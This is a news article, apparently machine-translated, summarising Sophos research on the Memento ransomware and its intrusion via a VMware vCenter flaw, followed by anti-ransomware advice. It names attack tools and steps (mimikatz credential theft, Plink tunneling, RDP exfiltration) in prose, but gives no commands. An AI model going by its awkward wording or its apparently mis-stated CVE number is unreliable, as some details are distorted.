Sophos researchers have discovered the new #ransomware: Memento

Posted by

The ransomware Memento block the files inside a password-protected archive
to circumvent the encryption and asks for a ransom of 1 million dollars in Bitcoin.

Sophos, a global leader in cyber security last generation, has published the details of the operation of a Memento, a new ransomware written in the Python language.

In the new search “New Ransomware Actor Uses Password Protected Archives to Bypass the Encryption Protection”, describes the characteristics of this attack that contained the files inside a password-protected archive when it fails to encrypt the data that it intends to strike.

“The ransomware attacks carried out with human intervention are rarely defined and clear in the real world,” said Sean Gallagher, a senior threat researcher at Sophos. “Cybercriminals take advantage of the opportunities when they arise, and progressing, changing a timely manner with the tactics and procedures of the attack.If they are able to penetrate into the network of one of their victims, certainly are not willing to come out empty-handed. The attachment Reminder is a good example of this, and serves to remind us to adopt security solutions that activate defences in depth. To be able to detect the presence of ransomware and the attempts of encryption is essential, but it's equally important to have safety technologies that can alert the IT managers in the case of other activities as unexpected as the lateral movement”.

History of the attack

Researchers at Sophos are convinced that the leaders of Memento are able to enter the network target of the attack mid-April 2021. To do this, they exploited a vulnerability in VMware vSphere, a tool for virtualization and cloud computing, Internet-facing, which has allowed them to penetrate inside of a server. The forensic evidence found by researchers at Sophos indicate that the attackers have begun the intrusion main at the beginning of may 2021.

The authors of the attack they used the first few months for the purpose of reconnaissance and lateral movement by exploiting Remote Desktop Protocol (RDP), the network scanner NMAP, Advanced Port Scanner, and the tool of tunneling with Secure Shell (SSH) Plink to create a free, interactive with the server that is allegedly infringed. The attackers are also used to mimikatz to collect the credentials of the account to use in the later stages of the attack.

According to researchers at Sophos, the 20 October 2021 the authors of this attack they then used a tool to legitimate such as WinRAR to carry out the compression of a series of files esfiltrandoli then via RDP.

The installation of the ransomware

The deployment of the ransomware occurred 23 October 2021. Researchers at Sophos have discovered that those who attacked has tried initially to encrypt the file, but the security measures in place have prevented the attempt. The cybercriminals have then changed their tactics, modifying and re-installing the ransomware. Have copied the file is not encrypted with a password-protected archives by using a free version of WinRAR, prior to encrypt its password, and delete the original files.

Later, they requested the payment of a ransom of $ 1 million in Bitcoin to restore the files. The company hit was fortunately able to retrieve the data without having to turn on the attackers.

The notes of redemption Memento

Operators ransomware to exploit a vulnerability (CVE-2021-21971) in the Web client, VMware vCenter Server for the initial access to the networks of the victims. The issue is a vulnerability for remote code execution is not authenticated and is rated a 9.8 on a scale of CVSS. Exploitation of this issue allows any attacker with remote access to the TCP/IP port 443 on the server vCenter open to execute commands on the underlying operating system with administrator privileges.

A patch for this vulnerability was released in the month of February of this year, but many companies have not corrected their systems.

The operators of Memento they launched the attacks last month, by exploiting a vulnerability in vCenter to steal administrative credentials, to impose the persistence through scheduled tasks, and then use RDP on SSH to navigate in the network. After the phase of reconnaissance, the attackers have used WinRAR to create an archive of files stolen and esfiltrarli. Finally, they have used the cleaning utility data BCWipe Jetico to remove any traces left behind, they then used a variant of ransomware based on Python for AES encryption.

Entry points open have supported more attackers

While the authors of the Memento they were inside the network affected, other cybercriminals are entered through the same vulnerability exploiting exploits similar. Each of them has installed on the same server hacked software for the mining of cryptovalute.. An attacker has installed a cryptominer XMR on 18 may, while another has installed a cryptominer XMRig on September 8 and, again, on the 3rd of October.

“We see it all the time: when the vulnerability accessible from the Internet, becomes public and are not neutralized with the appropriate patches, many of the attackers in the rush to take advantage of it. Longer you wait to mitigate them, more attackers will be attracted,” said Gallagher. “Cybercriminals are running constantly scanning the Internet to search for points of entry, vulnerable, and, of certainly not bring in a line to wait for when they find one. Be violated by more attackers multiply the damage and the recovery time for the victims, and it also makes it more complicated for the investigators to be able to clarify and understand who has done what, important information for those who must deal with the threats to help companies to avoid further attacks of the same kind”.

Safety tips

Sophos believes that this incident, in which most cyber crooks have violated the same server without patches connected to the Internet, stresses the importance of quickly apply the patch and test the safety of the software integrators, developers, contract, and service providers with which you are working.

Sophos also recommend the following best practices for general help defend against ransomware and related cyberattacchi:

At a strategic level

  • Deploy a security layers. Since the ransomware attacks begin more and more often to lead to extortion, the backup remain necessary, but are insufficient. It is more important than ever to keep away the opponents or intercept them quickly before they can cause damage. A security stratified blocks and detects the attackers on as many points as possible within an environment
  • Combine experts in the flesh with technology anti-ransomware. The secret to stop the ransomware resides in a defense-in-depth that combines technology, anti-ransomware dedicated to specific activities carried out by experts. The technology provides the scale and automation of where a company needs, while experts in the flesh, and the bones are more suited to the notice of the tactics, techniques and procedures that signal the presence of an attacker within the environment. If a company does not possess the competence within it may require the assistance of specialists in cybersecurity

At the tactical level daily

  • Monitor and respond to alarms. Make sure that there are tools, processes, and resources (people) available to monitor, investigate, and respond to the threats found in the environment. The attackers launch often their attacks outside working hours, at weekends or during public holidays in the assumption that there is almost no one to check
  • Define and enforce the use of strong passwords. Strong passwords are one of the first lines of defense. The password should be complex or created on purpose, and never be reused. To make this easier you can use a password manager can store the credentials of the staff
  • Use the authentication multifactor (MFA). Even strong passwords can be broken. Any form of authentication multifactor is better than nothing to protect access to critical resources such as e-mail, tool for remote management and network assets
  • Block accessible services. Perform network scans from the outside to identify and close the ports commonly used by VNC, RDP, or other tool for remote access. If a machine must be reachable through a tool for remote management, make sure that the tool resides behind a VPN or a solution for the access network zero-trust that it will make use of techniques MFA as part of the login procedure
  • Use segmentation and zero-trust. Separate the critical servers from one another and from the workstation by placing them inside separate VLANS and going in the direction of a network model, zero-trust
  • Make offline backups of information and applications. Keep the backup up to date, make sure that they are recoverable and keep a copy offline
  • Inventory asset and account. The presence in the network of devices is unknown, not protected or patched increases the risks and creates a situation in which a dangerous activity could go undetected. It is essential to have an updated inventory of all that is connected. Using scan to network, tools, IaaS and physical inspections to locate and categorize the devices, and install software for endpoint protection on any machine without protection
  • Make sure that the security products are configured correctly. They are also vulnerable systems and devices are only partially protected. It is important to ensure that security solutions are configured properly; as well as it is important to check and, where necessary, validate, and regularly update the security policy. The security features of the new implementation are not always automatically enabled. Do not disable the anti-tamper protection or to create broad exclusions from the controls, since this will simplify the job of the attackers
  • Verify the Active Directory (AD). Perform regular audits on all accounts in AD, making sure that none of them have more access to those that are actually necessary. Disable the account of the employees in the output as soon as they leave the company
  • Apply the patch to all the. Keep Windows and the rest of the operating systems and software. This means also to verify that the patches have been installed correctly and that there are critical systems such as domain controllers or machines connected to the Internet

Want to comment on? Turn on the discussion